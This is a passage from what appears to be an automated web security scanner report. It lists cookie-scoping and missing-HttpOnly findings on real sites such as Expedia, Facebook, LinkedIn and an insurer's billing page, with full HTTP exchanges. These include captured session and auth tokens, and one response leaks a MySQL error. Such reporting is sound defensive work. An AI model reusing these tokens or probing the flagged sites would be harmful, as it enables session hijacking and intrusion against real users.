Set-Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; Domain=.bizographics.com; Expires=Sat, 05-Nov-2011 13:50:38 GMT; Path=/
Set-Cookie: BizoData=LD8Lqa0kruispSaV6t7UwYtQb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGJ94jaV36dZRvdH39nGZ6tNcii8xtm6s0HisR0f148m02M66BUXiip7ft9cii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL1VlnkdUIIh0FExkNK7HUtFQY8D8EoTSfZVlnkdUIIh0AYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSXisM3wdRWhA3dsnRGwuisv9sgNCHPPoPZ5qdIs74mBmkdyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFahipEZiiUfSg1G9jy3KswFnWMODCrIgmWLLCZMvip3ebNkazzC5XAau0nMODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDJGFm85Jnii6bdsnRGwuisv9t6LhwMcOtHAUjz4EQIlrt9cii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtFNsVrcrw312KlSryiiippLvHRWwTxBUSFRuufykhwWSlghzjIvVLoBhj5NDTHr2wr1kiiqD792pBiiZisWoLipipOUKipVtMipadorvipIWA5B16a2n9ccq0ipUPxAAhwBFhw9bW02NQdnXDrRufkxSPPgRAiiWu31yLzG2bqzQfB1c7D7UHWcJ7wkafesisJezZzmURE5lZipFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTBCmcQve7W9mKliiSobRLLWb5OrVGMiprsJQvfINu2DxP8owJ5xoQhXZNp7hVJoVB1TGlJZ8zWJiiJArqYAAFGAQj0dI1pxbY6k4tmEPishbY3ELmLzCbjtVl37F6KeOOIHvpt; Domain=.bizographics.com; Expires=Sat, 05-Nov-2011 13:50:38 GMT; Path=/
Set-Cookie: BizoNetworkPartnerIndex=15; Domain=.bizographics.com; Expires=Wed, 01-Jun-2011 00:00:00 GMT; Path=/
Content-Length: 649
Connection: keep-alive

_bizo_set_session_cookie("_bizo_bzid","55f5fe79-12b4-4f78-9976-61924d438e85",1);_bizo_fire_rm("E6D","T8P","H3I","D8N","Q3K","C9Q");_bizo_set_session_cookie("_bizo_cksm","46E4889E3A878800",1);_bizo_fir
...[SNIP]...
17.49. http://www.compliancepoint.com/sub_serv_isc_pci.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.compliancepoint.com
Path:   /sub_serv_isc_pci.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sub_serv_isc_pci.asp?gclid=CJu4wszV1KgCFQ075QodRCyFgQ HTTP/1.1
Host: www.compliancepoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 07 May 2011 01:16:34 GMT
X-Powered-By: ASP.NET
Set-Cookie: SITESERVER=ID=e72934c3e090fe010326c542496bd26f; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.compliancepoint.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Length: 17114
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADDBQTC=NKAKGEBDADCKPECBKIOIPJEM; path=/
Cache-control: private

<html>
<head>
<title>CompliancePoint</title>

<link href="menu.css" type=text/css rel=stylesheet />
<link href="style.css" type=text/css rel=stylesheet />
<script src="main.js"></script>
<scrip
...[SNIP]...
17.50. http://www.expedia.com/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /default.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 69466
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:33:31 GMT
Connection: close
Set-Cookie: ipsnf3=v.3|US|1|511|washington; expires=Sun, 6-May-2012 00:00:01 GMT; path=/; domain=.expedia.com;
Set-Cookie: MC1=GUID=6EAD9261B09A4968ABBC2BAA8521F2DD; expires=Fri, 06-May-2016 07:00:00 GMT; domain=.expedia.com; path=/
Set-Cookie: COOKIECHECK=1; domain=.expedia.com; path=/
Content-Length: 69466


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<COMMENT TITLE="MO
...[SNIP]...
17.51. http://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pub/agent.dll?qscr=info HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:35:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX01235ACD77$E5$B5201000D$27$E96!G0.!5010$2302!50$ED$A3$27$0C7$85$FE$36!4$FF!e02000`95; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01F1458A8B$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ek$16$E4$24p$5B$39$89$91H`104; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 43196


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
17.52. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pub/agent.dll?qscr=fbak&&zz=1247500409281&&zz=1304739644741 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=fbak&&zz=1247500409281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DFAQ%25252520Support%2525253ASearch%25252520Results%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/pub/agent.dll%2525253Fqscr%2525253Dfbak%25252526%25252526zz%2525253D1247500409281%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; s1=`user=v.8,0,EX01CC562A07$F4$B5203000g$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50K$A9$11$90$F1$8C$A5$D1$82$AB$89$FB!e02000`133

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:40:52 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX0183E3F010$F4$B5204000k$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$83$A7rJ$D3$B5$CD3$82$AB$89$FB!e02000`129; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`airp=v.1,AUS`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 155628


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
17.53. http://www.facebook.com/SocialFollow  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /SocialFollow

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SocialFollow HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=dh9j6; reg_ext_ref=http%3A%2F%2Fwww.socialfollow.com%2F; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FSocialFollow; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Dpa.82321587255; wd=1066x968

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.49
X-Cnection: close
Date: Fri, 06 May 2011 17:41:49 GMT
Content-Length: 33424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
17.54. http://www.linkedin.com/pub/12/7a2/294  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /pub/12/7a2/294

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pub/12/7a2/294 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; __utmz=23068709.1303163602.1.1.utmcsr=rockyou.com|utmccn=(referral)|utmcmd=referral|utmcct=/rymini/; __qca=P0-87169230-1303163602430; bcookie="v=1&4d9675db-dcd4-4b34-bfd9-5f98cf2c89da"; __utma=23068709.2028061763.1303163602.1303561523.1304000549.4; __utmv=23068709.guest

Response

HTTP/1.0 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: _lipt=deleteMe; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:1022634729605892638"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:9ALnYa_o7w0-_aDZAiRhif6cnHkmMFvo5bAux56op-0wmSGoVi5tpl:1304703510:a79f22fd5b55c77016e1e883ba6f2782d2bb74f6"; Version=1; Max-Age=1799; Expires=Fri, 06-May-2011 18:08:29 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Location: http://www.linkedin.com/pub/social-follow/12/7a2/294
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 06 May 2011 17:38:29 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close

17.55. http://www.linkedin.com/pub/social-follow/12/7a2/294  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /pub/social-follow/12/7a2/294

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pub/social-follow/12/7a2/294 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; __utmz=23068709.1303163602.1.1.utmcsr=rockyou.com|utmccn=(referral)|utmcmd=referral|utmcct=/rymini/; __qca=P0-87169230-1303163602430; bcookie="v=1&4d9675db-dcd4-4b34-bfd9-5f98cf2c89da"; __utma=23068709.2028061763.1303163602.1303561523.1304000549.4; __utmv=23068709.guest; JSESSIONID="ajax:1022634729605892638"; leo_auth_token="GST:9ALnYa_o7w0-_aDZAiRhif6cnHkmMFvo5bAux56op-0wmSGoVi5tpl:1304703510:a79f22fd5b55c77016e1e883ba6f2782d2bb74f6"; lang="v=2&lang=en"

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _lipt=deleteMe; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:9ALnYa_o7w0-_aDZAiRhif6cnHkmMFvo5bAux56op-0wmSGoVi5tpl:1304703833:12ab3b2206f30def848810f18bb65505a76b5904"; Version=1; Max-Age=1799; Expires=Fri, 06-May-2011 18:13:52 GMT; Path=/
Vary: Accept-Encoding
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Last-Modified: Thu, 09 Apr 2009 03:12:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Fri, 06 May 2011 17:43:53 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: keep-alive
Content-Length: 26636

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta name="descr
...[SNIP]...
17.56. http://www.myroitracking.com/newServing/tracking_id.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myroitracking.com
Path:   /newServing/tracking_id.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /newServing/tracking_id.php?d=serw.clicksor.com&r=http%3A%2F%2Fserw.clicksor.com%2FnewServing%2Ftracking_id.php%3Fb%3D1%26&gtruid=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.myroitracking.com

Response

HTTP/1.1 302 Found
Date: Fri, 06 May 2011 15:47:09 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.5
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: TRUID=13046968294316; expires=Sun, 05-Jun-2011 15:47:09 GMT; path=/; domain=.myroitracking.com
Location: http://serw.clicksor.com/newServing/tracking_id.php?b=1&UID=13046968294316&TRSTR=1&RTID=
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0

18. Cookie without HttpOnly flag set  previous  next
There are 287 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

18.1. https://broker.gotoassist.com/h/lbmc  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://broker.gotoassist.com
Path:   /h/lbmc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h/lbmc?Portal=lbmc&Target=ds%2FqueryPost.flow&Template=ds%2FphoneModeRedemption.tmpl&JavaScript=true&Form=lbmcSmartPage&Name_Full=&CompanyName=&Question= HTTP/1.1
Host: broker.gotoassist.com
Connection: keep-alive
Referer: http://www.gotoassist.com/ph/lbmc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:43:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: dtsSession=SessionInfo%3D237919200%253A316A1A5A2614CFC; path=/
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8818

       <html>


<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>GoToAssist: live online customer support</title>

<script language="JavaScript">
<!--
function empty
...[SNIP]...
18.2. http://dominionenterprises.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dominionenterprises.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: dominionenterprises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:33:43 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=53f6ccea4163b5ac138ab46c663a40cc; expires=Sun, 08 May 2011 19:33:43 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:33:43 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=4b8d75bf4b0577980e547e8469625d1c7e3088827c5403bc4dc443179c5eca8539d2c650; Path=/
Content-Length: 32708

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Con
...[SNIP]...
18.3. https://events.gsmiweb.com/subscribe.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /subscribe.php HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:38:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=2nk15qm3tn7surn8vvl1ofsf05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 307
Connection: close
Content-Type: text/html


<script language="javascript">
window.location.href="events.php";
</script>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the ri
...[SNIP]...
18.4. http://hmficweb.hinghammutual.com/billing_view/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://hmficweb.hinghammutual.com
Path:   /billing_view/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /billing_view/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/billing_view/billingview.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4009
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCDDDAA=IPHJKIBCJCNJALBDJMOOPNNJ; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<HEAD>
<TITLE>The Hingham Group - Billing Details Access</TITLE>

...[SNIP]...
18.5. http://hmficweb.hinghammutual.com/billing_view/billingview.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://hmficweb.hinghammutual.com
Path:   /billing_view/billingview.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

